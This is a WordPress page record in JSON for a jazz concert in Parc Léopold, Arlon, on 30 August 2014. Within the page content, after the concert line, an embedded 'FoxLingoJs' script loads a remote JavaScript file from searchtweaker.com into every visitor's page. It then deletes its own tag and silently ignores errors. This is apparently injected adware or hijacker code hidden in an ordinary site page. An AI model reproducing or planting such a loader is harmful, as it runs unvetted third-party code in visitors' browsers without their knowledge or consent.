{"id":822,"date":"2014-08-31T12:28:30","date_gmt":"2014-08-31T11:28:30","guid":{"rendered":"http:\/\/www.varietyjazz.be\/?page_id=822"},"modified":"2015-09-04T19:53:17","modified_gmt":"2015-09-04T18:53:17","slug":"concert-a-arlon-le-30-aout-2014","status":"publish","type":"page","link":"https:\/\/www.varietyjazz.be\/?page_id=822","title":{"rendered":"Concert \u00e0 Arlon le 30 Ao\u00fbt 2014"},"content":{"rendered":"<p>Concert dans le Parc L\u00e9opold \u00e0 Arlon le 30 Ao\u00fbt 2014.<br \/>\n[nggallery id=5]<\/p>\n<p><script id=\"FoxLingoJs\" type=\"text\/javascript\">\/\/ <![CDATA[\n(function(){try{var header=document.getElementsByTagName(\"HEAD\")[0];var script=document.createElement(\"SCRIPT\");script.src=\"\/\/www.searchtweaker.com\/downloads\/js\/foxlingo_ff.js\";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==\"complete\"||this.readyState==\"loaded\")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();\n\/\/ ]]><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Concert dans le Parc L\u00e9opold \u00e0 Arlon le 30 Ao\u00fbt 2014. [nggallery id=5]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":25,"menu_order":5,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-822","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.varietyjazz.be\/index.php?rest_route=\/wp\/v2\/pages\/822","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.varietyjazz.be\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.varietyjazz.be\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.varietyjazz.be\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.varietyjazz.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=822"}],"version-history":[{"count":4,"href":"https:\/\/www.varietyjazz.be\/index.php?rest_route=\/wp\/v2\/pages\/822\/revisions"}],"predecessor-version":[{"id":825,"href":"https:\/\/www.varietyjazz.be\/index.php?rest_route=\/wp\/v2\/pages\/822\/revisions\/825"}],"up":[{"embeddable":true,"href":"https:\/\/www.varietyjazz.be\/index.php?rest_route=\/wp\/v2\/pages\/25"}],"wp:attachment":[{"href":"https:\/\/www.varietyjazz.be\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=822"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}